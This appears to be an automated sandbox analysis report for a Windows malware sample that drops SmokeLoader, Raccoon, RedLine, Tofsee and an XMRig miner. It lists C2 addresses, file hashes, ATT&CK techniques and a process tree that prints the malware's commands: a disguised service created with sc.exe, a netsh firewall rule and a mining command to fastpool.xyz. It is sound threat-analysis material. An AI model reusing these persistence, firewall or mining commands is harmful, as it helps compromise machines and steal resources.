Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    10-12-2021 18:47

General

  • Target

    7c0a44d8807c6b2290c0d66bbbe8777c.exe

  • Size

    217KB

  • MD5

    7c0a44d8807c6b2290c0d66bbbe8777c

  • SHA1

    1ec2617cb7899cfad8b1ee74b0d4d1f56805844f

  • SHA256

    2246c25ec97114ce31a3366169b54b719f9afa7c01b0d82b1231dffc8abb88b3

  • SHA512

    25006989eaa3a1b9372adbc5441f30876c65cfaa1809ef21807c69daaea5d51e626db7a2d6a3e7372512a63edf758acbeb549434dce0577fd3a07eddc84558b3

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

raccoon

Version

1.8.3-hotfix

Botnet

f797145799b7b1b77b35d81de942eee0908da519

Attributes
  • url4cnc

    http://91.219.236.27/capibar

    http://94.158.245.167/capibar

    http://185.163.204.216/capibar

    http://185.225.19.238/capibar

    http://185.163.204.218/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Extracted

Family

raccoon

Version

1.8.3-hotfix

Botnet

eab89db8f8e51b4a23c6cffb85db8684a0f53e06

Attributes
  • url4cnc

    http://91.219.236.27/zalmanssx

    http://94.158.245.167/zalmanssx

    http://185.163.204.216/zalmanssx

    http://185.225.19.238/zalmanssx

    http://185.163.204.218/zalmanssx

    https://t.me/zalmanssx

rc4.plain
rc4.plain

Extracted

Family

tofsee

C2

mubrikych.top

oxxyfix.xyz

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7c0a44d8807c6b2290c0d66bbbe8777c.exe
    "C:\Users\Admin\AppData\Local\Temp\7c0a44d8807c6b2290c0d66bbbe8777c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Users\Admin\AppData\Local\Temp\7c0a44d8807c6b2290c0d66bbbe8777c.exe
      "C:\Users\Admin\AppData\Local\Temp\7c0a44d8807c6b2290c0d66bbbe8777c.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:756
  • C:\Users\Admin\AppData\Local\Temp\51A9.exe
    C:\Users\Admin\AppData\Local\Temp\51A9.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:1028
  • C:\Users\Admin\AppData\Local\Temp\B626.exe
    C:\Users\Admin\AppData\Local\Temp\B626.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Users\Admin\AppData\Local\Temp\B626.exe
      C:\Users\Admin\AppData\Local\Temp\B626.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1772
  • C:\Users\Admin\AppData\Local\Temp\DDF2.exe
    C:\Users\Admin\AppData\Local\Temp\DDF2.exe
    1⤵
    • Executes dropped EXE
    PID:1256
  • C:\Users\Admin\AppData\Local\Temp\E811.exe
    C:\Users\Admin\AppData\Local\Temp\E811.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1500
  • C:\Users\Admin\AppData\Local\Temp\F230.exe
    C:\Users\Admin\AppData\Local\Temp\F230.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1508
  • C:\Users\Admin\AppData\Local\Temp\89D.exe
    C:\Users\Admin\AppData\Local\Temp\89D.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1724
  • C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    1⤵
    • Accesses Microsoft Outlook profiles
    • outlook_office_path
    • outlook_win_path
    PID:908
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    1⤵
      PID:1764
    • C:\Users\Admin\AppData\Local\Temp\37D8.exe
      C:\Users\Admin\AppData\Local\Temp\37D8.exe
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:1628
    • C:\Users\Admin\AppData\Local\Temp\5C6A.exe
      C:\Users\Admin\AppData\Local\Temp\5C6A.exe
      1⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1768
    • C:\Users\Admin\AppData\Local\Temp\7289.exe
      C:\Users\Admin\AppData\Local\Temp\7289.exe
      1⤵
      • Executes dropped EXE
      PID:1700
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hqonzsaw\
        2⤵
          PID:1756
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mmiyaeul.exe" C:\Windows\SysWOW64\hqonzsaw\
          2⤵
            PID:1612
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" create hqonzsaw binPath= "C:\Windows\SysWOW64\hqonzsaw\mmiyaeul.exe /d\"C:\Users\Admin\AppData\Local\Temp\7289.exe\"" type= own start= auto DisplayName= "wifi support"
            2⤵
              PID:1644
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" description hqonzsaw "wifi internet conection"
              2⤵
                PID:760
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" start hqonzsaw
                2⤵
                  PID:1996
                • C:\Windows\SysWOW64\netsh.exe
                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                  2⤵
                    PID:588
                • C:\Windows\SysWOW64\hqonzsaw\mmiyaeul.exe
                  C:\Windows\SysWOW64\hqonzsaw\mmiyaeul.exe /d"C:\Users\Admin\AppData\Local\Temp\7289.exe"
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:1624
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    PID:1440
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:868

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Persistence

                New Service

                1
                T1050

                Modify Existing Service

                1
                T1031

                Registry Run Keys / Startup Folder

                1
                T1060

                Privilege Escalation

                New Service

                1
                T1050

                Defense Evasion

                Disabling Security Tools

                1
                T1089

                Modify Registry

                2
                T1112

                Virtualization/Sandbox Evasion

                1
                T1497

                Credential Access

                Credentials in Files

                2
                T1081

                Discovery

                Query Registry

                4
                T1012

                Virtualization/Sandbox Evasion

                1
                T1497

                System Information Discovery

                4
                T1082

                Peripheral Device Discovery

                1
                T1120

                Collection

                Data from Local System

                2
                T1005

                Email Collection

                1
                T1114

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\37D8.exe
                  MD5

                  a23cbbfaad45c7ea103d9be4b956defc

                  SHA1

                  1b86ba74f79689b11809421b442ba587fa1d48e3

                  SHA256

                  b16bc88a066cab9bb8f0931a1397a55bd3843240e6dd1f59adbd1b6dd07ea747

                  SHA512

                  ecb9fd49543b1da182168a2f2343cc057ac13f791d5efd0d9bb75f4023663448f0aabc1e43601cfcf6531ba921796720f1888f949609808693a78f9a8e18d159

                • C:\Users\Admin\AppData\Local\Temp\51A9.exe
                  MD5

                  65fd5caa0beaf2c6915e5b05004e5ba8

                  SHA1

                  4a1e5e5c188ef1e8a3e5bf7fa7db17f0307c6912

                  SHA256

                  ef0d3b336aeef7f0a0aeb78ec08f1f20592d8006bcbe3fbb559e18aebcf060a3

                  SHA512

                  c3dee0f304f45f274e28a737ac11506f99066abae57576f75c1b8151c0c8cee5c9e377ab2bc79929f5cf7f7f0f0b77947e657454daecd0e5fcea998df9c85d11

                • C:\Users\Admin\AppData\Local\Temp\5C6A.exe
                  MD5

                  65fd5caa0beaf2c6915e5b05004e5ba8

                  SHA1

                  4a1e5e5c188ef1e8a3e5bf7fa7db17f0307c6912

                  SHA256

                  ef0d3b336aeef7f0a0aeb78ec08f1f20592d8006bcbe3fbb559e18aebcf060a3

                  SHA512

                  c3dee0f304f45f274e28a737ac11506f99066abae57576f75c1b8151c0c8cee5c9e377ab2bc79929f5cf7f7f0f0b77947e657454daecd0e5fcea998df9c85d11

                • C:\Users\Admin\AppData\Local\Temp\7289.exe
                  MD5

                  84b6df0a9ab6a18d4810ca534b17d7cc

                  SHA1

                  cf534454d4527e792dedc6a59aa4c16b2f454c7f

                  SHA256

                  635c96eadf804c9514fa3c4cc93f08ccf658e32d331d7646fd1d2a2a8f80dc09

                  SHA512

                  570f1e03f358bd26e634eca6539cc12fc0bad75b15448f256d16c4b55bd7677cdaa02c77afd9de4e18db9fd14384ba6f41d0b61f251c098f0725c2f3d49d3c56

                • C:\Users\Admin\AppData\Local\Temp\7289.exe
                  MD5

                  84b6df0a9ab6a18d4810ca534b17d7cc

                  SHA1

                  cf534454d4527e792dedc6a59aa4c16b2f454c7f

                  SHA256

                  635c96eadf804c9514fa3c4cc93f08ccf658e32d331d7646fd1d2a2a8f80dc09

                  SHA512

                  570f1e03f358bd26e634eca6539cc12fc0bad75b15448f256d16c4b55bd7677cdaa02c77afd9de4e18db9fd14384ba6f41d0b61f251c098f0725c2f3d49d3c56

                • C:\Users\Admin\AppData\Local\Temp\89D.exe
                  MD5

                  fcf030085e86da948a7cca2076687a91

                  SHA1

                  a9fd9e62e0e4714478dc9b06857f82a4ab0014d2

                  SHA256

                  67539484b73f85bcedfb8c39d1591e6472546d037ec483a477a7273bae4cb6be

                  SHA512

                  567ff3b17537573fde2c88265d830743525752f9fe70cc39316947d60a0f980096673bdcf228a30ff886ba52c97ae49d0771f3255ae6f4edfb7e03ce499afbee

                • C:\Users\Admin\AppData\Local\Temp\89D.exe
                  MD5

                  fcf030085e86da948a7cca2076687a91

                  SHA1

                  a9fd9e62e0e4714478dc9b06857f82a4ab0014d2

                  SHA256

                  67539484b73f85bcedfb8c39d1591e6472546d037ec483a477a7273bae4cb6be

                  SHA512

                  567ff3b17537573fde2c88265d830743525752f9fe70cc39316947d60a0f980096673bdcf228a30ff886ba52c97ae49d0771f3255ae6f4edfb7e03ce499afbee

                • C:\Users\Admin\AppData\Local\Temp\B626.exe
                  MD5

                  187015fc514826ede9d4a475df1adffb

                  SHA1

                  9d756f51f881b4e57449aaec1145a7bafa10a855

                  SHA256

                  c634a165a20911711ef58474ff908660660b070fe70e8af10e272575ab580c35

                  SHA512

                  de99e0fd5298cd0fd009aa78d87bf2930c261bf10af7d35306cc5332f9123899509093aefae467bbf19483c6df5c5cbc5ecfa026c811c12591888e0a6f39c6b2

                • C:\Users\Admin\AppData\Local\Temp\B626.exe
                  MD5

                  187015fc514826ede9d4a475df1adffb

                  SHA1

                  9d756f51f881b4e57449aaec1145a7bafa10a855

                  SHA256

                  c634a165a20911711ef58474ff908660660b070fe70e8af10e272575ab580c35

                  SHA512

                  de99e0fd5298cd0fd009aa78d87bf2930c261bf10af7d35306cc5332f9123899509093aefae467bbf19483c6df5c5cbc5ecfa026c811c12591888e0a6f39c6b2

                • C:\Users\Admin\AppData\Local\Temp\B626.exe
                  MD5

                  187015fc514826ede9d4a475df1adffb

                  SHA1

                  9d756f51f881b4e57449aaec1145a7bafa10a855

                  SHA256

                  c634a165a20911711ef58474ff908660660b070fe70e8af10e272575ab580c35

                  SHA512

                  de99e0fd5298cd0fd009aa78d87bf2930c261bf10af7d35306cc5332f9123899509093aefae467bbf19483c6df5c5cbc5ecfa026c811c12591888e0a6f39c6b2

                • C:\Users\Admin\AppData\Local\Temp\DDF2.exe
                  MD5

                  bce50d5b17bb88f22f0000511026520d

                  SHA1

                  599aaed4ee72ec0e0fc4cada844a1c210e332961

                  SHA256

                  77e40ca1c6001b2c01ef50b84585d68127eeb5691c899b049a9948fb60b13455

                  SHA512

                  c7dea899ed181efd0474a8b181b8fd8e91c734703a03ac71381e072684c93dd6d002629ffcfeefb15b6ca79ba1cf8cc62acd2b16fe7e0faed444c6f3eebb7536

                • C:\Users\Admin\AppData\Local\Temp\E811.exe
                  MD5

                  0cefed061e2a2241ecd302d7790a2f80

                  SHA1

                  5f119195af2db118c5fbac21634bea00f5d5b8da

                  SHA256

                  014ad60fd2c294dd8fb63c022961e17df1ba74bb1209a64634112913edc44983

                  SHA512

                  7b7e4460dad4f176b11a66a37bbc1b2fd2c7e042c5e949c72edcc3c93d9bb9d210d8ecc95d8aad533c761947958e008c4ced8b5faef9319ebb5bf29752381cba

                • C:\Users\Admin\AppData\Local\Temp\E811.exe
                  MD5

                  0cefed061e2a2241ecd302d7790a2f80

                  SHA1

                  5f119195af2db118c5fbac21634bea00f5d5b8da

                  SHA256

                  014ad60fd2c294dd8fb63c022961e17df1ba74bb1209a64634112913edc44983

                  SHA512

                  7b7e4460dad4f176b11a66a37bbc1b2fd2c7e042c5e949c72edcc3c93d9bb9d210d8ecc95d8aad533c761947958e008c4ced8b5faef9319ebb5bf29752381cba

                • C:\Users\Admin\AppData\Local\Temp\F230.exe
                  MD5

                  91ffc79763232828ab1bcd72ce1ddc22

                  SHA1

                  e64c484b04b4f0db0c3f1ff845e16e2f2e9174e8

                  SHA256

                  0dce668ad51da4de96cd40c5419c0f4a9c1a5b3050ea529cf81ff64c49e21a22

                  SHA512

                  c52f04eef0dbb2a3715abdbe97a9f89cc1a0bc4f2ba2dc1ec166c323add2a71969cf5cb42898c98d8dd7746cdc8e708e04ee9575f55d05b5908536486928bb5f

                • C:\Users\Admin\AppData\Local\Temp\F230.exe
                  MD5

                  91ffc79763232828ab1bcd72ce1ddc22

                  SHA1

                  e64c484b04b4f0db0c3f1ff845e16e2f2e9174e8

                  SHA256

                  0dce668ad51da4de96cd40c5419c0f4a9c1a5b3050ea529cf81ff64c49e21a22

                  SHA512

                  c52f04eef0dbb2a3715abdbe97a9f89cc1a0bc4f2ba2dc1ec166c323add2a71969cf5cb42898c98d8dd7746cdc8e708e04ee9575f55d05b5908536486928bb5f

                • C:\Users\Admin\AppData\Local\Temp\mmiyaeul.exe
                  MD5

                  40d4053bbb08f0528c11944c187fb490

                  SHA1

                  7574045a721f393b1aa522020f104f3d8e680b35

                  SHA256

                  e64276f74925939061f7d72b6e5fe5b48865c24250be7ae9c6c3ca7618d61ca1

                  SHA512

                  e2cb5d4bff6a25833f5165d891cce1905714c25c58bf8ec7730ec11e5e77221d9ad3c3c0c4273cf97ca007531f2f1c19b0b4d459f7cec894ca8bdd0bfe7315f6

                • C:\Windows\SysWOW64\hqonzsaw\mmiyaeul.exe
                  MD5

                  40d4053bbb08f0528c11944c187fb490

                  SHA1

                  7574045a721f393b1aa522020f104f3d8e680b35

                  SHA256

                  e64276f74925939061f7d72b6e5fe5b48865c24250be7ae9c6c3ca7618d61ca1

                  SHA512

                  e2cb5d4bff6a25833f5165d891cce1905714c25c58bf8ec7730ec11e5e77221d9ad3c3c0c4273cf97ca007531f2f1c19b0b4d459f7cec894ca8bdd0bfe7315f6

                • \ProgramData\sqlite3.dll
                  MD5

                  e477a96c8f2b18d6b5c27bde49c990bf

                  SHA1

                  e980c9bf41330d1e5bd04556db4646a0210f7409

                  SHA256

                  16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

                  SHA512

                  335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

                • \Users\Admin\AppData\Local\Temp\B626.exe
                  MD5

                  187015fc514826ede9d4a475df1adffb

                  SHA1

                  9d756f51f881b4e57449aaec1145a7bafa10a855

                  SHA256

                  c634a165a20911711ef58474ff908660660b070fe70e8af10e272575ab580c35

                  SHA512

                  de99e0fd5298cd0fd009aa78d87bf2930c261bf10af7d35306cc5332f9123899509093aefae467bbf19483c6df5c5cbc5ecfa026c811c12591888e0a6f39c6b2

                • memory/588-192-0x0000000000000000-mapping.dmp
                • memory/756-54-0x0000000000402F47-mapping.dmp
                • memory/756-55-0x0000000075431000-0x0000000075433000-memory.dmp
                  Filesize

                  8KB

                • memory/756-53-0x0000000000400000-0x0000000000409000-memory.dmp
                  Filesize

                  36KB

                • memory/760-189-0x0000000000000000-mapping.dmp
                • memory/868-210-0x000000000011259C-mapping.dmp
                • memory/908-151-0x000000006F2F1000-0x000000006F2F3000-memory.dmp
                  Filesize

                  8KB

                • memory/908-147-0x0000000000000000-mapping.dmp
                • memory/908-154-0x00000000001E0000-0x0000000000254000-memory.dmp
                  Filesize

                  464KB

                • memory/908-155-0x0000000000170000-0x00000000001DB000-memory.dmp
                  Filesize

                  428KB

                • memory/1028-63-0x0000000000020000-0x0000000000029000-memory.dmp
                  Filesize

                  36KB

                • memory/1028-64-0x0000000000400000-0x00000000004CC000-memory.dmp
                  Filesize

                  816KB

                • memory/1028-61-0x0000000000248000-0x0000000000259000-memory.dmp
                  Filesize

                  68KB

                • memory/1028-59-0x0000000000000000-mapping.dmp
                • memory/1256-81-0x0000000000400000-0x0000000000491000-memory.dmp
                  Filesize

                  580KB

                • memory/1256-80-0x0000000000220000-0x00000000002AF000-memory.dmp
                  Filesize

                  572KB

                • memory/1256-78-0x000000000062B000-0x000000000067A000-memory.dmp
                  Filesize

                  316KB

                • memory/1256-76-0x0000000000000000-mapping.dmp
                • memory/1424-188-0x0000000005EC0000-0x0000000005ED6000-memory.dmp
                  Filesize

                  88KB

                • memory/1424-58-0x0000000002680000-0x0000000002696000-memory.dmp
                  Filesize

                  88KB

                • memory/1424-65-0x0000000003880000-0x0000000003896000-memory.dmp
                  Filesize

                  88KB

                • memory/1424-75-0x0000000003FA0000-0x0000000003FB6000-memory.dmp
                  Filesize

                  88KB

                • memory/1440-204-0x0000000000080000-0x0000000000095000-memory.dmp
                  Filesize

                  84KB

                • memory/1440-201-0x0000000000089A6B-mapping.dmp
                • memory/1500-169-0x0000000074DD0000-0x0000000074DE7000-memory.dmp
                  Filesize

                  92KB

                • memory/1500-99-0x0000000073F30000-0x0000000073FB0000-memory.dmp
                  Filesize

                  512KB

                • memory/1500-98-0x00000000763F0000-0x000000007647F000-memory.dmp
                  Filesize

                  572KB

                • memory/1500-119-0x0000000075430000-0x000000007607A000-memory.dmp
                  Filesize

                  12.3MB

                • memory/1500-96-0x0000000001000000-0x0000000001001000-memory.dmp
                  Filesize

                  4KB

                • memory/1500-82-0x0000000000000000-mapping.dmp
                • memory/1500-86-0x0000000074850000-0x000000007489A000-memory.dmp
                  Filesize

                  296KB

                • memory/1500-183-0x00000000761B0000-0x00000000761E5000-memory.dmp
                  Filesize

                  212KB

                • memory/1500-88-0x0000000000100000-0x0000000000101000-memory.dmp
                  Filesize

                  4KB

                • memory/1500-89-0x0000000000370000-0x00000000003B5000-memory.dmp
                  Filesize

                  276KB

                • memory/1500-91-0x00000000767C0000-0x000000007686C000-memory.dmp
                  Filesize

                  688KB

                • memory/1500-121-0x0000000004EA0000-0x0000000004EA1000-memory.dmp
                  Filesize

                  4KB

                • memory/1500-87-0x0000000001000000-0x0000000001069000-memory.dmp
                  Filesize

                  420KB

                • memory/1500-95-0x0000000075060000-0x00000000751BC000-memory.dmp
                  Filesize

                  1.4MB

                • memory/1500-93-0x0000000076E10000-0x0000000076E67000-memory.dmp
                  Filesize

                  348KB

                • memory/1500-92-0x0000000076E90000-0x0000000076ED7000-memory.dmp
                  Filesize

                  284KB

                • memory/1508-105-0x0000000001270000-0x0000000001403000-memory.dmp
                  Filesize

                  1.6MB

                • memory/1508-115-0x00000000763F0000-0x000000007647F000-memory.dmp
                  Filesize

                  572KB

                • memory/1508-117-0x0000000000820000-0x0000000000867000-memory.dmp
                  Filesize

                  284KB

                • memory/1508-100-0x0000000000000000-mapping.dmp
                • memory/1508-120-0x0000000002950000-0x0000000002951000-memory.dmp
                  Filesize

                  4KB

                • memory/1508-109-0x0000000076E90000-0x0000000076ED7000-memory.dmp
                  Filesize

                  284KB

                • memory/1508-112-0x0000000075060000-0x00000000751BC000-memory.dmp
                  Filesize

                  1.4MB

                • memory/1508-104-0x0000000074850000-0x000000007489A000-memory.dmp
                  Filesize

                  296KB

                • memory/1508-170-0x0000000074DD0000-0x0000000074DE7000-memory.dmp
                  Filesize

                  92KB

                • memory/1508-108-0x00000000767C0000-0x000000007686C000-memory.dmp
                  Filesize

                  688KB

                • memory/1508-106-0x0000000000090000-0x0000000000091000-memory.dmp
                  Filesize

                  4KB

                • memory/1508-118-0x0000000075430000-0x000000007607A000-memory.dmp
                  Filesize

                  12.3MB

                • memory/1508-113-0x0000000001270000-0x0000000001271000-memory.dmp
                  Filesize

                  4KB

                • memory/1508-110-0x0000000076E10000-0x0000000076E67000-memory.dmp
                  Filesize

                  348KB

                • memory/1508-116-0x0000000073F30000-0x0000000073FB0000-memory.dmp
                  Filesize

                  512KB

                • memory/1612-185-0x0000000000000000-mapping.dmp
                • memory/1624-203-0x0000000000400000-0x000000000082C000-memory.dmp
                  Filesize

                  4.2MB

                • memory/1628-161-0x0000000000000000-mapping.dmp
                • memory/1628-168-0x0000000000400000-0x000000000082F000-memory.dmp
                  Filesize

                  4.2MB

                • memory/1628-167-0x0000000000220000-0x000000000023C000-memory.dmp
                  Filesize

                  112KB

                • memory/1628-166-0x0000000000020000-0x0000000000031000-memory.dmp
                  Filesize

                  68KB

                • memory/1644-187-0x0000000000000000-mapping.dmp
                • memory/1656-56-0x0000000000020000-0x0000000000028000-memory.dmp
                  Filesize

                  32KB

                • memory/1656-57-0x0000000000030000-0x0000000000039000-memory.dmp
                  Filesize

                  36KB

                • memory/1700-180-0x0000000000220000-0x0000000000233000-memory.dmp
                  Filesize

                  76KB

                • memory/1700-179-0x0000000000020000-0x000000000002D000-memory.dmp
                  Filesize

                  52KB

                • memory/1700-181-0x0000000000400000-0x000000000082C000-memory.dmp
                  Filesize

                  4.2MB

                • memory/1700-171-0x0000000000000000-mapping.dmp
                • memory/1724-129-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-130-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-160-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-158-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-157-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-163-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-122-0x0000000000000000-mapping.dmp
                • memory/1724-156-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-148-0x0000000074B90000-0x0000000074D20000-memory.dmp
                  Filesize

                  1.6MB

                • memory/1724-125-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-126-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-127-0x0000000000250000-0x0000000000295000-memory.dmp
                  Filesize

                  276KB

                • memory/1724-146-0x0000000074D70000-0x0000000074DC8000-memory.dmp
                  Filesize

                  352KB

                • memory/1724-145-0x0000000074D20000-0x0000000074D6F000-memory.dmp
                  Filesize

                  316KB

                • memory/1724-144-0x00000000770B0000-0x00000000771CD000-memory.dmp
                  Filesize

                  1.1MB

                • memory/1724-143-0x0000000076520000-0x000000007652C000-memory.dmp
                  Filesize

                  48KB

                • memory/1724-142-0x0000000074DD0000-0x0000000074DE7000-memory.dmp
                  Filesize

                  92KB

                • memory/1724-128-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-159-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-141-0x0000000074EB0000-0x0000000074EC7000-memory.dmp
                  Filesize

                  92KB

                • memory/1724-140-0x0000000074EA0000-0x0000000074EAB000-memory.dmp
                  Filesize

                  44KB

                • memory/1724-139-0x0000000075060000-0x00000000751BC000-memory.dmp
                  Filesize

                  1.4MB

                • memory/1724-137-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-132-0x0000000000140000-0x0000000000141000-memory.dmp
                  Filesize

                  4KB

                • memory/1724-136-0x0000000076E90000-0x0000000076ED7000-memory.dmp
                  Filesize

                  284KB

                • memory/1724-135-0x0000000000BE0000-0x0000000001144000-memory.dmp
                  Filesize

                  5.4MB

                • memory/1724-133-0x00000000767C0000-0x000000007686C000-memory.dmp
                  Filesize

                  688KB

                • memory/1756-182-0x0000000000000000-mapping.dmp
                • memory/1764-150-0x0000000000000000-mapping.dmp
                • memory/1764-152-0x0000000000070000-0x0000000000077000-memory.dmp
                  Filesize

                  28KB

                • memory/1764-153-0x0000000000060000-0x000000000006C000-memory.dmp
                  Filesize

                  48KB

                • memory/1768-175-0x0000000000400000-0x00000000004CC000-memory.dmp
                  Filesize

                  816KB

                • memory/1768-173-0x0000000000928000-0x0000000000939000-memory.dmp
                  Filesize

                  68KB

                • memory/1768-164-0x0000000000000000-mapping.dmp
                • memory/1772-71-0x0000000000402F47-mapping.dmp
                • memory/1812-74-0x0000000000020000-0x0000000000028000-memory.dmp
                  Filesize

                  32KB

                • memory/1812-66-0x0000000000000000-mapping.dmp
                • memory/1996-190-0x0000000000000000-mapping.dmp